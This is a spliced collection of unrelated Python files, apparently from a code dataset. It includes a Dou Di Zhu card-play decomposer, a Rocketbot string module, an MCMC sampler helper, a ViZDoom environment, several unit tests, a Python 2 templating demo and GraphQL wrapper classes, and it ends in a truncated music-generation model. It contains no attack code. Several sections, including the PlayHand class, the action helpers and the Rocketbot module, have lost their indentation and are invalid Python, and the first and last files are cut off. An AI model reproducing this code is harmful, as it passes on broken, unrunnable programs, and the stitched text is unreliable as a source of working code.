    Q value: value of a state-action pair; the larger Q(s, a), the more
    action a should be taken in state s.
    q = d(next_state) + len(a)
    """

    @classmethod
    def decompose_value(cls, card_after: np.ndarray) -> int:
        """
        Return the decomposition value of a hand (ignoring 2s and jokers).
        """
        if len(card_after) == 0:
            return 0
        card_after = card_lt2(card_after)
        di, d_value, _ = card_to_suffix_di(card_after)

        # Solo chains / pair chains can beat the plain count value.
        for t in range(1, 3):
            max_len = max(len(i) for i in card_split(di[t]))
            if max_len >= KIND_TO_MIN_LEN[t]:
                d_value = max(d_value, t * max_len)
        return d_value

    @classmethod
    def _delta_q(cls, _max_q, _q):
        # Distance from the best q; hand-emptying actions (q near MAX_Q)
        # are folded back so they compare on the same scale.
        return (_max_q - _q) if _max_q - _q < 1000 else (_max_q - MAX_Q + 1 - _q)

    def _calc_q(self, lt2_state: np.ndarray, actions: np.ndarray[np.ndarray]) -> np.ndarray:
        """Compute Q for every state-action pair."""
        result = []
        for a in actions:
            reward: int = 0

            # Penalty for breaking a bomb: e.g. with 5 5 5 5 6 prefer playing
            # the bomb over a trio with kicker.
            for card in a:
                if np.sum(lt2_state == card) == 4 and len(a) < 4:
                    reward = -1
                    break

            next_state: np.ndarray = get_next_state(lt2_state, a)
            if next_state.size > 0:
                d_value = self.decompose_value(next_state)
                result.append(d_value + reward + len(a))
            else:
                # This action empties the hand, so d takes the maximum value.
                result.append(MAX_Q + reward + len(a))
        return np.array(result)

    def _eval_actions(self,
                      func,
                      lt2_state: np.ndarray,
                      **kwargs) -> Tuple[np.ndarray, np.ndarray]:
        # Dispatch: single-kind generators take (state, length); sequence
        # generators take (card_list, kind, length).
        actions = np.array(
            func(lt2_state, kwargs['length']) if 'card_list' not in kwargs.keys() else func(kwargs['card_list'],
                                                                                            kwargs['kind'],
                                                                                            kwargs['length']))
        # q = d(next state) + len(a)
        # Compute q for every action available in lt2_state.
        q_list: np.ndarray = self._calc_q(lt2_state, actions)
        if len(q_list) == 0:
            return np.array([], dtype=int), np.array([], dtype=int)
        return actions, q_list

    def _process_card(self, card: np.ndarray):
        # Split the hand into the non-contiguous parts: cards below 2,
        # the 2s, and the jokers ("ghosts").
        self._lt2_cards, eq2_cards, self._ghosts = card_lt2_two_g(card)
        self._lt2_states: List[np.ndarray] = card_split(self._lt2_cards)
        self.card2_count: int = len(eq2_cards)

    def _get_all_actions_and_q_lists(self, lt2_state: np.ndarray) -> int:
        """Collect every action and its q-list for one lt2_state; return max q."""
        di, max_count, max_card_value = card_to_suffix_di(lt2_state)

        # solo pair trio bomb plane other
        self._actions = [[], [], [], [], [], []]
        self._q_lists = [np.array([], dtype=int), np.array([], dtype=int), np.array([], dtype=int),
                         np.array([], dtype=int), np.array([], dtype=int), np.array([], dtype=int)]

        # solo pair trio bomb
        for i in range(1, 5):
            self._actions[i - 1], self._q_lists[i - 1] = self._eval_actions(_get_single_actions, lt2_state, length=i)

        # plane
        for length in range(3, len(di[3]) + 1):
            seq_actions, seq_q_list = self._eval_actions(_get_seq_actions,
                                                         lt2_state,
                                                         card_list=di[3],
                                                         kind=3,
                                                         length=length)
            self._actions[4].extend(seq_actions)
            self._q_lists[4] = np.concatenate([self._q_lists[4], seq_q_list])

        # Extract solo chains and pair chains.
        for k, min_len in KIND_TO_MIN_LEN.items():
            card_list = di[k]
            for length in range(min_len, len(card_list) + 1):
                seq_actions, seq_q_list = self._eval_actions(_get_seq_actions,
                                                             lt2_state,
                                                             card_list=card_list,
                                                             kind=k,
                                                             length=length)
                self._actions[5].extend(seq_actions)
                self._q_lists[5] = np.concatenate([self._q_lists[5], seq_q_list])

        max_q = 0
        for q_list in self._q_lists:
            if q_list.size:
                max_q = max(np.max(q_list), max_q)
        return max_q
class FollowDecomposer(AbstractDecomposer):
    """
    Decomposer used when following (trying to beat) the previous combo.
    """

    def __init__(self):
        self._output: Optional[List[np.ndarray]] = None

        # Lists holding the kicker ("take") cards.
        self._take_lists: Optional[Dict[int, List[np.ndarray]]] = None

        # Lists holding the main-part cards.
        self._main_lists: Optional[Dict[int, List[np.ndarray]]] = None

        # Lists holding main + kicker cards.
        self._main_take_lists: Optional[Dict[int, List[np.ndarray]]] = None

        # Bomb list.
        self._bomb_list: Optional[List[np.ndarray]] = None

        # Tracks only the size of the main part.
        self._max_combo: Optional[Combo] = None
        self._last_combo: Optional[Combo] = None
        self._main_kind: Optional[int] = None
        self._take_kind: Optional[int] = None

    def _add_bomb(self, bomb_list: list) -> None:
        """Collect the bombs that may be played over the last combo."""
        self._bomb_list: List[np.ndarray] = []

        # Rocket (both jokers).
        if len(self._ghosts) == 2:
            self._bomb_list.append(self._ghosts)

        # Bomb made of four 2s.
        if self.card2_count == 4:
            self._bomb_list.append(np.array([CARD_2] * 4))

        if self._last_combo.is_bomb():
            # Beating a bomb requires a strictly larger bomb.
            for card in bomb_list:
                if card > self._last_combo.value:
                    self._bomb_list.append(np.array([card, card, card, card]))
        else:
            for card in bomb_list:
                self._bomb_list.append(np.array([card, card, card, card]))

    def _add_valid_ghost(self):
        """Add a single joker; the 2s must have been added beforehand."""
        if self._ghosts.size:
            if self._last_combo.is_solo() \
                    and self._last_combo.main_kind == 1 and self._last_combo.value < self._ghosts[-1]:
                self._main_lists[2].append(self._ghosts[-1:])
                self._max_combo.cards = self._ghosts[-1:]
            elif self._max_combo.take_kind == 1:
                self._take_lists[2].append(self._ghosts[-1:])

    def _add_valid_card2(self):
        """Add the valid 2s; the jokers are added afterwards."""
        if self.card2_count:
            if self._last_combo.is_single() \
                    and self._last_combo.main_kind <= self.card2_count and self._last_combo.value < CARD_2:
                self._main_lists[self._max_combo.main_kind].append(np.array([CARD_2] * self._max_combo.main_kind))
                self._max_combo.cards = [CARD_2] * self._max_combo.main_kind
            if self._last_combo.take_kind <= self.card2_count:
                # A 2 is valued one more than a normal card.
                self._take_lists[self._last_combo.take_kind + 1].append(np.array([CARD_2] * self._last_combo.take_kind))

    def __merge_takes_to_main_seq(self, main_q: int, main_seq: np.ndarray, take_count: int) -> Tuple[int, np.ndarray]:
        tk = 0
        main_takes: np.ndarray = np.array(main_seq)
        total_delta_q = main_q

        # Iterate _take_lists ascending so the best kickers merge first.
        for delta_q, take_list in sorted(self._take_lists.items()):
            for take in take_list:
                if take[0] not in main_seq:
                    tk += 1
                    total_delta_q += delta_q
                    main_takes = np.concatenate((main_takes, take))
                    if tk == take_count:
                        return total_delta_q, main_takes
        return 0, np.array([])

    def _merge_valid_main_takes(self) -> None:
        """Join the valid main parts with their kicker cards."""
        # Non-bomb: a trio takes 1 solo / 1 pair per trio; a bomb takes 2.
        take_count = self._last_combo.seq_len
        if self._last_combo.main_kind == 4:
            take_count *= 2
        self._main_take_lists = defaultdict(list)
        for take_list in self._take_lists.values():
            take_list.sort(key=MAX_VALUE_CMP)
        if self._main_lists:
            # Pick the best main_list and sort it.
            main_q = min(self._main_lists.keys())
            self._main_lists[main_q].sort(key=MAX_VALUE_CMP)
            for main_seq in self._main_lists[main_q]:
                total_delta_q, main_takes = self.__merge_takes_to_main_seq(main_q, main_seq, take_count)
                if main_takes.size > 0:
                    # File the resulting main_takes under its quality score.
                    self._main_take_lists[total_delta_q].append(main_takes)

        # Build the largest possible main_takes as well.
        self._max_main_takes = self.__merge_takes_to_main_seq(0, self._max_combo.cards, take_count)[1]

    def _update_main_lists_and_find_max(self, a: np.ndarray, q: int, max_q: int) -> None:
        """Add the action to the main lists if valid, and track the maximum."""
        main_kind = self._last_combo.main_kind
        seq_len = self._last_combo.seq_len
        value = self._last_combo.value
        combo = Combo()
        combo.cards = a

        # Keep only main parts obeying the follow rule.
        if combo.value > value and combo.main_kind == main_kind and combo.seq_len == seq_len:
            self._main_lists[self._delta_q(max_q, q)].append(a)

            # Compare the main part only; kickers are irrelevant here.
            if combo.value > self._max_combo.value:
                self._max_combo = deepcopy(combo)

    def _best_main_takes(self):
        if not self._main_take_lists:
            return 0, []
        min_delta_q = min(self._main_take_lists.keys())
        self._main_take_lists[min_delta_q].sort(key=MOST_VALUE_CMP)
        return min_delta_q, self._main_take_lists[min_delta_q]

    def _append_takes(self, length: int, kind: int, max_q):
        for a, q in zip(self._actions[kind - 1], self._q_lists[kind - 1]):
            self._take_lists[self._delta_q(max_q, q)].append(a[:length])

    def _add_valid_lt2_actions(self):
        for lt2_state in self._lt2_states:
            if lt2_state.size > 0:
                max_q: int = super(FollowDecomposer, self)._get_all_actions_and_q_lists(lt2_state)

                # Add solos or pairs to _take_lists; a pair can also serve
                # as two separate solo kickers.
                if self._take_kind == 1:
                    self._append_takes(1, 1, max_q)
                    self._append_takes(1, 2, max_q)
                elif self._take_kind == 2:
                    self._append_takes(2, 2, max_q)

                for actions, q_list in zip(self._actions, self._q_lists):
                    for a, q in zip(actions, q_list):
                        # Add valid actions to _main_lists and update the
                        # largest main combo seen so far.
                        self._update_main_lists_and_find_max(a, q, max_q)

    def _thieve_valid_actions(self) -> Tuple[int, List[np.ndarray]]:
        """Filter the valid and reasonably good actions under last combo's rule."""
        self._add_valid_card2()
        self._add_valid_ghost()
        self._add_valid_lt2_actions()
        if not self._main_lists:
            return 0, []
        if self._take_kind:
            self._merge_valid_main_takes()
            return self._best_main_takes()
        else:
            self._max_main_takes = self._max_combo.cards
            min_delta_q = min(self._main_lists.keys())
            self._main_lists[min_delta_q].sort(key=MAX_VALUE_CMP)
            return min_delta_q, self._main_lists[min_delta_q]

    def _init(self, last_combo: Combo):
        # Initialise; keys are max_q - q: the smaller the key the better the
        # decomposition, so smaller keys are preferred.
        self._take_lists: Dict[int, List[np.ndarray]] = defaultdict(list)
        self._main_lists: Dict[int, List[np.ndarray]] = defaultdict(list)
        self._output = []

        # max_combo keeps only the main part, ignoring any kickers.
        self._max_combo = deepcopy(last_combo)
        self._max_main_takes = self._max_combo.cards
        self._last_combo = last_combo
        self._main_kind = self._max_combo.main_kind
        self._take_kind = self._max_combo.take_kind

    def get_good_follows(self, state: np.ndarray, last_combo: Combo) \
            -> Tuple[List[np.ndarray], int, List[np.ndarray], np.ndarray]:
        """
        Give reasonably good follow-up plays.
        @param state: the current hand.
        @param last_combo: the previous play.
        @return: 4-tuple: bombs; delta between the best decomposition and the
            best follow (larger = worse split); list of good plays; the
            largest possible play (empty array when nothing beats last_combo).
        """
        if last_combo.is_rocket():
            return [], 0, [], np.array([], dtype=int)
        self._process_card(state)
        self._init(last_combo)
        min_delta_q, self._output = self._thieve_valid_actions()
        self._add_bomb(card_to_di(self._lt2_cards)[0][4])
        self._max_combo.cards = self._max_main_takes
        return self._bomb_list, min_delta_q, self._output, (
            self._max_main_takes if self._max_combo > last_combo else np.array([], dtype=int))
class PlayHand:
"""
出牌时,根据d_actions对手牌进行进一步分类
"""
def __init__(self, min_solo: int, max_solo: int):
"""
初始化Hand类
@see PlayDecomposer
"""
# solo pair trio bomb
self._singles: List[List[np.ndarray]] = [[], [], [], []]
self._planes: List[np.ndarray] = []
self._trios_take: List[np.ndarray] = []
self._planes_take: List[np.ndarray] = []
self._bombs_take: List[np.ndarray] = []
self._seq_solo5: List[np.ndarray] = []
self._other_seq: List[np.ndarray] = []
self._has_rocket: bool = False
self._min_solo: int = min_solo
self._max_solo: int = max_solo
def add_to_hand(self, card_lists: List[Dict[int, List[np.ndarray]]]):
"""将各种类型牌加入到PlayHand中"""
for i in range(4):
if card_lists[i].keys():
min_delta_q = min(card_lists[i].keys())
self._singles[i] = card_lists[i][min_delta_q]
self._singles[i].sort(key=MAX_VALUE_CMP)
# plane
if card_lists[4].keys():
min_delta_q = min(card_lists[4].keys())
self._planes = card_lists[4][min_delta_q]
self._planes.sort(key=MAX_VALUE_CMP)
if card_lists[5].keys():
min_delta_q = min(card_lists[5].keys())
for action in card_lists[5][min_delta_q]:
if action.size == 5:
self._seq_solo5.append(action)
else:
self._other_seq.append(action)
self._seq_solo5.sort(key=MAX_VALUE_CMP)
self._merge_main_takes(self._planes, self._planes_take)
self._merge_main_takes(self._singles[2], self._trios_take)
self._merge_main_takes(self._singles[3], self._bombs_take)
i = 0
while i < len(self._bombs_take):
if self._bombs_take[i].size <= 4:
del self._bombs_take[i]
else:
i += 1
@staticmethod
def _choose_takes(take_list: List[np.ndarray], main_part: np.ndarray, take_count: int, split_pair: bool = False):
main_part = np.concatenate([main_part] + take_list[:take_count])
if split_pair:
main_part = np.concatenate([main_part, take_list[take_count][:1]])
return main_part
def _merge_main_takes(self, main_list: List[np.ndarray], extended_target: List[np.ndarray]):
"""
合并主要部分与带的牌
"""
main_take_list: List[np.ndarray] = []
for main_part in main_list:
# 防止main part带上自己的部分,例如 7 7 7不能带7
temp_pairs: List[np.ndarray] = [i for i in self._singles[1] if i[0] not in np.unique(main_part)]
temp_solos: List[np.ndarray] = [i for i in self._singles[0] if
i[0] not in np.unique(main_part) and i[0] not in np.unique(temp_pairs)]
take_count: int = math.ceil(main_part.size / 3)
if len(temp_solos) >= take_count and len(temp_pairs) >= take_count:
if np.mean(temp_solos) > np.mean(temp_pairs):
main_take_list.append(self._choose_takes(temp_solos, main_part, take_count))
else:
main_take_list.append(self._choose_takes(temp_pairs, main_part, take_count))
elif len(temp_pairs) >= take_count:
main_take_list.append(self._choose_takes(temp_pairs, main_part, take_count))
elif len(temp_solos) >= take_count:
main_take_list.append(self._choose_takes(temp_solos, main_part, take_count))
elif len(temp_solos) + 2 * len(temp_pairs) >= take_count:
len_solos = len(temp_solos)
main_part = self._choose_takes(temp_solos, main_part, len_solos)
main_take_list.append(
self._choose_takes(
temp_pairs, main_part, (take_count - len_solos) // 2, (take_count - len_solos) % 2 == 1
)
)
else:
main_take_list.append(main_part)
extended_target.extend(main_take_list)
extended_target.sort(key=MOST_VALUE_CMP)
@property
def solos(self) -> List[np.ndarray]:
"""单"""
return self._singles[0]
@property
def pairs(self) -> List[np.ndarray]:
"""对"""
return self._singles[1]
@property
def trios(self) -> List[np.ndarray]:
"""三"""
return self._singles[2]
    @property
    def trios_take(self):
        """Triplets with attached kicker(s) ("three with M")."""
        return self._trios_take
    @property
    def bombs(self) -> List[np.ndarray]:
        """Bombs (four of a kind)."""
        return self._singles[3]
    @property
    def bombs_take(self) -> List[np.ndarray]:
        """Four of a kind with two attached kickers ("four with two")."""
        return self._bombs_take
    @property
    def planes(self) -> List[np.ndarray]:
        """Airplanes (chained triplets, without kickers)."""
        return self._planes
    @property
    def planes_take(self):
        """Airplanes with kickers ("planes with M")."""
        return self._planes_take
    @property
    def other_seq(self) -> List[np.ndarray]:
        """All other sequence types (straights, consecutive pairs, ...)."""
        return self._other_seq
    @property
    def seq_solo5(self) -> List[np.ndarray]:
        """Solo straights of length 5."""
        return self._seq_solo5
    @property
    def has_rocket(self) -> bool:
        """Whether the hand holds the rocket (both jokers)."""
        return self._has_rocket
    @property
    def min_solo(self) -> int:
        """Smallest solo card obtained by force-splitting."""
        return self._min_solo
    @property
    def max_solo(self) -> int:
        """Largest solo card obtained by force-splitting."""
        return self._max_solo
    def __repr__(self):
        # Debug representation: dump every decomposition bucket verbatim.
        return 'PlayHand: ' + repr(self.__dict__)
class PlayDecomposer(AbstractDecomposer):
    """
    Greedy decomposition algorithm for choosing Dou Di Zhu plays.

    When playing, forced splits are only considered for the largest and the
    smallest solo; every other card type follows the best decomposition.

    Define c as one card; by the rules of Dou Di Zhu, c ∈ [1, 15] ∩ Z+.
    Define s as the sequence of all cards the player holds, s = (c1, c2, ..., ci).
    Define a as one legal play, a = (c1, c2, ..., ci).
    Let A_s be the set of all legal decompositions of s, with a ∈ A_s.
    The quality of a decomposition a is scored by D(a), defined as:
        D(a) = len(a) + max( max(len(a')) , 1) - number of bombs broken
    where a ∈ A, D(a) ∈ Z+, and a' ∈ s - a.
    The larger D(a), the better the decomposition.

    Algorithm:
    1. Split s into consecutive runs, the twos, and the jokers; e.g.
       (1,1,2,2,5,5,7,10,13,14) becomes (1,1,2,2) (5,5) (7) (10) (13) (14).
    2. Add the jokers and the twos to the best decomposition sequence A'.
    3. For each run si, compute D(a) for actions a without kickers.
    4. Merge the D(a) of main parts with kickers.
    5. Output argmax(D(a)).
    """
    def __init__(self):
        # One defaultdict per action category, filled in get_good_plays.
        self.cards_q_maps_list: Optional[List[Dict[int, List[np.ndarray]]]] = None
    def _map_actions(self, actions, q_list, max_q: int, idx: int):
        # Keep only the actions whose score equals the best score; they land
        # under key 0 because max_q - q == 0 whenever max_q == q.
        # NOTE(review): if sub-optimal actions were meant to be bucketed by
        # their distance from max_q, the `if` guard looks too strict — confirm.
        for a, q in zip(actions, q_list):
            if max_q == q:
                self.cards_q_maps_list[idx][max_q - q].append(a)
    def get_good_plays(self, cards: np.ndarray) -> PlayHand:
        """
        Get good play actions.
        @param cards: the current hand.
        @return: a PlayHand containing every good play type
        """
        self._process_card(cards)
        self.cards_q_maps_list = [defaultdict(list), defaultdict(list),
                                  defaultdict(list), defaultdict(list),
                                  defaultdict(list), defaultdict(list)]
        play_hand = PlayHand(np.min(cards), np.max(cards))
        for lt2_state in self._lt2_states:
            if lt2_state.size > 0:
                max_q = self._get_all_actions_and_q_lists(lt2_state)
                i = 0
                for actions, q_list in zip(self._actions, self._q_lists):
                    self._map_actions(actions, q_list, max_q, i)
                    i += 1
        if self.cards_q_maps_list[0].keys() and self.cards_q_maps_list[1].keys():
            # Drop solos whose rank already appears in the best pairs.
            min_key = min(self.cards_q_maps_list[0].keys())
            min_key2 = min(self.cards_q_maps_list[1].keys())
            self.cards_q_maps_list[0][min_key] = [i for i in self.cards_q_maps_list[0][min_key] if
                                                  i[0] not in np.unique(self.cards_q_maps_list[1][min_key2])]
        if self.card2_count:
            # All twos are always played together as a single group.
            self.cards_q_maps_list[self.card2_count - 1][0].append(np.array([CARD_2] * self.card2_count))
        if self._ghosts.size == 2:
            # Both jokers present: rocket (writes the private flag directly).
            play_hand._has_rocket = True
        elif self._ghosts.size == 1:
            self.cards_q_maps_list[0][0].append(self._ghosts)
        play_hand.add_to_hand(self.cards_q_maps_list)
        return play_hand
def get_next_state(state: np.ndarray, action: np.ndarray) -> np.ndarray:
    """
    Return the state left after playing ``action`` from ``state``.

    Removes one occurrence of every card in ``action`` (earliest occurrences
    first), preserving the order of the remaining cards.

    @param state: current cards
    @param action: cards played
    @return: the next state (remaining cards)
    @raise ValueError: if ``action`` contains a card not present in ``state``
    """
    from collections import Counter
    # Count multiplicities once so removal is O(len(state) + len(action))
    # instead of the previous O(n*m) repeated list.remove() scans.
    to_remove = Counter(np.asarray(action).tolist())
    remaining = []
    for card in np.asarray(state).tolist():
        if to_remove[card] > 0:
            to_remove[card] -= 1
        else:
            remaining.append(card)
    leftovers = +to_remove  # unary + drops zero counts
    if leftovers:
        # Preserve the original contract: playing a card you do not hold fails.
        raise ValueError(
            "action contains cards not in state: %s" % sorted(leftovers.elements())
        )
    return np.array(remaining)
def _get_single_actions(state: np.ndarray, length: int) -> List[List[int]]:
"""
获取所有单种牌面的动作(单,对,三,炸弹)
@param state: 状态
@param length: 动作长度
"""
result = []
last_card = -1
state = list(state)
for i in range(length, len(state) + 1):
if state[i - 1] == state[i - length] and state[i - 1] != last_card and (
state.count(state[i - 1]) < 4 or length % 2 == 0):
last_card = state[i - 1]
result.append([last_card] * length)
return result
def _get_seq_actions(card_list: list, kind: int, length: int) -> List[List[int]]:
"""
获取顺子/连对/飞机/炸弹的动作(单,对,三,炸弹)
"""
result = []
for i in range(length - 1, len(card_list)):
if card_list[i] == card_list[i - length + 1] + length - 1:
result.append(sorted(card_list[i - length + 1: i + 1] * kind))
return result
| StarcoderdataPython |
9743630 | # coding: utf-8
"""
Base para desarrollo de modulos externos.
Para obtener el modulo/Funcion que se esta llamando:
GetParams("module")
Para obtener las variables enviadas desde formulario/comando Rocketbot:
var = GetParams(variable)
Las "variable" se define en forms del archivo package.json
Para modificar la variable de Rocketbot:
SetVar(Variable_Rocketbot, "dato")
Para obtener una variable de Rocketbot:
var = GetVar(Variable_Rocketbot)
Para obtener la Opcion seleccionada:
opcion = GetParams("option")
Para instalar librerias se debe ingresar por terminal a la carpeta "libs"
pip install <package> -t .
"""
import difflib
"""
Obtengo el modulo que fueron invocados
"""
module = GetParams("module")
if module == "diff_ratio":
str_1 = GetParams("str1")
str_2 = GetParams("str2")
result = GetParams("result")
try:
ratio = difflib.SequenceMatcher(None, str_1, str_2).ratio()
SetVar(result, ratio)
except Exception as e:
PrintException()
raise e
if module == "replace":
old_str = GetParams("old")
new_str = GetParams("new")
var = GetParams("var")
result = GetParams("result")
try:
new_var = var.replace(old_str, new_str)
SetVar(result, new_var)
except Exception as e:
PrintException()
raise e
if module == "split":
var = GetParams("var")
delimiter = GetParams("delimiter")
result = GetParams("result")
try:
new_var = var.split(delimiter)
SetVar(result, new_var)
except Exception as e:
PrintException()
raise e
if module == "find":
var = GetParams("var")
data = GetParams("data")
result = GetParams("result")
try:
new_var = var.find(data)
SetVar(result, new_var)
except Exception as e:
PrintException()
raise e
if module == "reverse":
string = GetParams("string")
result = GetParams("result")
reverse_string = string[::-1]
if result:
SetVar(result, reverse_string)
| StarcoderdataPython |
1632063 | '''
Define the function related with the Markov Chain Monter Carlo (MCMC) process.
'''
import numpy as np
import emcee
import time
import os
import git
path_git = git.Repo('.', search_parent_directories=True).working_tree_dir
path_datos_global = os.path.dirname(path_git)
def MCMC_sampler(log_probability, initial_values,
                filename = "default.h5",
                witness_file = 'witness.txt',
                max_samples = 10000,
                witness_freq = 100,
                tolerance = 0.01,
                save_path = path_datos_global+'/Resultados_cadenas/'):
    '''
    Run an emcee ensemble sampler with HDF5 checkpointing, writing progress to
    a plain-text "witness" file and stopping early on convergence.

    log_probability: logarithm of the posterior distribution that will be sampled.
    initial_values: array of shape (nwalkers, ndim) with the walkers' starting points.
    filename: name of the h5 file that contains the chains information.
    witness_file: name of the witness file.
    max_samples: maximum number of samples, if the chains do not converge.
    witness_freq: frequency used to print the state of the calculation in the witness file.
    tolerance: tolerance parameter of the convergence criterion.
    save_path: directory in which the outputs are stored. Changing this attribute in
    the configuration file is recommended.
    '''
    nwalkers, ndim = initial_values.shape
    # Set up the backend
    os.chdir(save_path)
    backend = emcee.backends.HDFBackend(filename)
    backend.reset(nwalkers, ndim) # Don't forget to clear it in case the file already exists
    textfile_witness = open(witness_file,'w+')
    textfile_witness.close()
    #%%
    #Initialize the sampler
    sampler = emcee.EnsembleSampler(nwalkers, ndim, log_probability, backend=backend)
    #sampler = emcee.EnsembleSampler(nwalkers, ndim, log_probability, backend=backend,
    #                    moves=[(emcee.moves.DEMove(), 0.4), (emcee.moves.DESnookerMove(), 0.3)
    #                    , (emcee.moves.KDEMove(), 0.3)])
    # This will be useful to testing convergence
    old_tau = np.inf
    t1 = time.time()
    # Now we'll sample for up to max_samples steps
    for sample in sampler.sample(initial_values, iterations=max_samples, progress=True):
        # Only check convergence every 'witness_freq' steps
        if sampler.iteration % witness_freq: # 'witness_freq' is how often convergence is checked
            continue
        os.chdir(save_path)
        # NOTE: witness-file text is deliberately kept in Spanish (user-facing output).
        textfile_witness = open(witness_file,'w')
        textfile_witness.write('Número de iteración: {} \t'.format(sampler.iteration))
        t2 = time.time()
        textfile_witness.write('Duración {} minutos y {} segundos'.format(int((t2-t1)/60),
                int((t2-t1) - 60*int((t2-t1)/60))))
        textfile_witness.close()
        # Compute the autocorrelation time so far
        # Using tol=0 means that we'll always get an estimate even
        # if it isn't trustworthy
        tau = sampler.get_autocorr_time(tol=0)
        # Check convergence
        converged = np.all(tau * 100 < sampler.iteration) # 100 is the convergence threshold
        # Also require tau to stay relatively constant:
        converged &= np.all((np.abs(old_tau - tau) / tau) < tolerance)
        if converged:
            textfile_witness = open(witness_file,'a')
            textfile_witness.write('\n Convergió!')
            textfile_witness.close()
            break
        old_tau = tau
| StarcoderdataPython |
5162144 | from vizdoomgym.envs.vizdoomenv import VizdoomEnv
class VizdoomTakeCover(VizdoomEnv):
    """Gym environment for the ViZDoom "Take Cover" scenario."""
    def __init__(self):
        # 7 selects the Take Cover scenario — presumably an index into
        # VizdoomEnv's scenario table; confirm against vizdoomgym upstream.
        super(VizdoomTakeCover, self).__init__(7)
| StarcoderdataPython |
12853147 | from blocksync._consts import ByteSizes
from blocksync._status import Blocks
def test_initialize_status(fake_status):
    # Expect: chunk size is the source size split evenly across workers.
    assert fake_status.chunk_size == fake_status.src_size // fake_status.workers
def test_add_block(fake_status):
    # Expect: each added block is tallied by kind, and `done` is their total.
    fake_status.add_block("same")
    fake_status.add_block("same")
    fake_status.add_block("diff")
    assert fake_status.blocks == Blocks(same=2, diff=1, done=3)
def test_get_rate(fake_status):
    # Expect: Return 0.00 when nothing done
    assert fake_status.rate == 0.00
    # 10 MiB total in 1 MiB blocks -> each block is 10% of the rate.
    fake_status.block_size = ByteSizes.MiB
    fake_status.src_size = fake_status.dest_size = ByteSizes.MiB * 10
    # Expect: Return 50.00 when half done
    fake_status.add_block("same")
    fake_status.add_block("same")
    fake_status.add_block("same")
    fake_status.add_block("diff")
    fake_status.add_block("diff")
    assert fake_status.rate == 50.00
    # Expect: Return 100.00 when all done
    fake_status.add_block("same")
    fake_status.add_block("same")
    fake_status.add_block("same")
    fake_status.add_block("diff")
    fake_status.add_block("diff")
    assert fake_status.rate == 100.00
    # Expect: Return 100.00 (clamped) when exceeding the total size
    fake_status.add_block("diff")
    assert fake_status.rate == 100.00
| StarcoderdataPython |
4925301 | #!/usr/bin/env python
"""Unit test for ..."""
import requests
import unittest
from sagas.ofbiz.entities import MetaEntity
class TestSimple(unittest.TestCase):
    """Smoke tests for MetaEntity against a running OFBiz instance."""
    @classmethod
    def setUpClass(self):
        """Set up function called when the class is constructed."""
        # NOTE(review): base_url/headers are set but never used by
        # test_simple; `self` here is actually the class (classmethod).
        self.base_url = 'http://127.0.0.1:5000/graphql'
        self.headers = {'content-type': 'application/json'}
    @classmethod
    def tearDownClass(self):
        """Tear down function called when the class is deconstructed."""
        pass
    def test_simple(self):
        # Exercises find_one/find_list; prints results instead of asserting,
        # so this only verifies the calls do not raise.
        entity = MetaEntity("Product")
        print(entity.primary)
        rec = entity.find_one(productId='10005')
        print(rec['internalName'])
        recs = entity.find_list(5, 0)
        print(len(recs))
        for r in recs:
            print(r['internalName'])
        product_id = "10013"
        entity = MetaEntity("Product")
        rec = entity.find_one(productId=product_id)
        print(rec['description'])
if __name__ == '__main__':
    # Run the TestSimple suite with verbose output.
    suite = unittest.TestLoader().loadTestsFromTestCase(TestSimple)
    unittest.TextTestRunner(verbosity=2).run(suite)
| StarcoderdataPython |
3319917 | <gh_stars>0
import string
def replace_use_template(strObj):
    """Demonstrate string templating styles (Python 2 script).

    NOTE(review): the ``strObj`` parameter is never used; kept only because
    the existing call site passes an argument.
    """
    # New style in python2.4
    new_style = string.Template('This is $thing')
    strA = new_style.substitute(thing=2)
    print strA
    strB = new_style.substitute({'thing': 10})
    print strB
    #Old style in python2.3
    old_style = 'This is %(thing)s'
    strC = old_style % {'thing' : 'love'}
    print strC
if __name__ == '__main__':
    # Demo entry point; the argument is ignored by the function.
    replace_use_template('')
| StarcoderdataPython |
4914620 | <gh_stars>1-10
import json
from pony.orm import db_session
from blogsley.user import User
class Schemata:
    """Base class for GraphQL-style wire objects."""

    def __init__(self):
        # Record the concrete subclass name for the GraphQL __typename field.
        self.typename = type(self).__name__

    def wire(self):
        """Serialize to a wire dict; the base class carries no payload."""
        return {}
class Connection(Schemata):
    """GraphQL-style connection: wraps a list of objects as edges."""

    def __init__(self, objs, edge_class, node_class):
        super().__init__()
        # One edge per source object; pagination info is filled in later.
        self.edges = [edge_class(obj, node_class) for obj in objs]
        self.pageInfo = None

    def wire(self):
        """Serialize the connection: typename, serialized edges, pageInfo."""
        return {
            '__typename': self.typename,
            'edges': [edge.wire() for edge in self.edges],
            'pageInfo': self.pageInfo,
        }
class Edge(Schemata):
    """GraphQL-style edge: a cursor plus a wrapped node."""

    def __init__(self, obj, node_class):
        super().__init__()
        self.cursor = ""
        self.node = node_class(obj)

    def wire(self):
        """Serialize the edge: typename, cursor, serialized node."""
        return {
            '__typename': self.typename,
            'cursor': self.cursor,
            'node': self.node.wire(),
        }
class Node(Schemata):
    """GraphQL-style node wrapping a domain object."""

    def __init__(self, objekt):
        super().__init__()
        self.objekt = objekt

    def wire(self):
        """Serialize the wrapped object's dict plus its __typename."""
        result = self.objekt.to_dict()
        # BUG FIX: a trailing comma previously made __typename a 1-tuple
        # (('Node',)) instead of a plain string, unlike Connection/Edge.
        result['__typename'] = self.typename
        return result
class UserConnection(Connection):
    """Connection of User records, built from UserEdge/UserNode."""
    def __init__(self, objs):
        super().__init__(objs, edge_class=UserEdge, node_class=UserNode)
class UserEdge(Edge):
    """Edge for User nodes."""
    def __init__(self, obj, node_class):
        # NOTE(review): the node_class argument is ignored; UserNode is
        # hard-wired here — confirm that is intentional.
        super().__init__(obj, UserNode)
class UserNode(Node):
    """Node wrapping a User record."""
    def __init__(self, objekt):
        super().__init__(objekt)
@db_session
def test():
    """Manual smoke test: list users and dump a UserConnection (Pony ORM)."""
    #Users = User.select()
    users = [u for u in User.select()]
    for u in users:
        print(u.id, u.username)
    connection = UserConnection(users)
    print(connection.wire())
if __name__ == "__main__":
test()
| StarcoderdataPython |
9727850 | <reponame>KMU-AELAB-MusicProject/MusicGeneration_VAE-torch<filename>graph/model.py
import torch
import torch.nn as nn
from .decoder import Decoder
from .encoder import Encoder
from .phrase_encoder import PhraseModel
from .refiner import Refiner
from graph.weights_initializer import weights_init
class Model(nn.Module):
    """VAE-style music generation model: note encoder/decoder conditioned on
    a phrase-level feature and a position, followed by a refiner network."""
    def __init__(self):
        super().__init__()
        # Channel widths mirror each other between encoder and decoder.
        self.encoder = Encoder([64, 128, 256, 512, 1024])
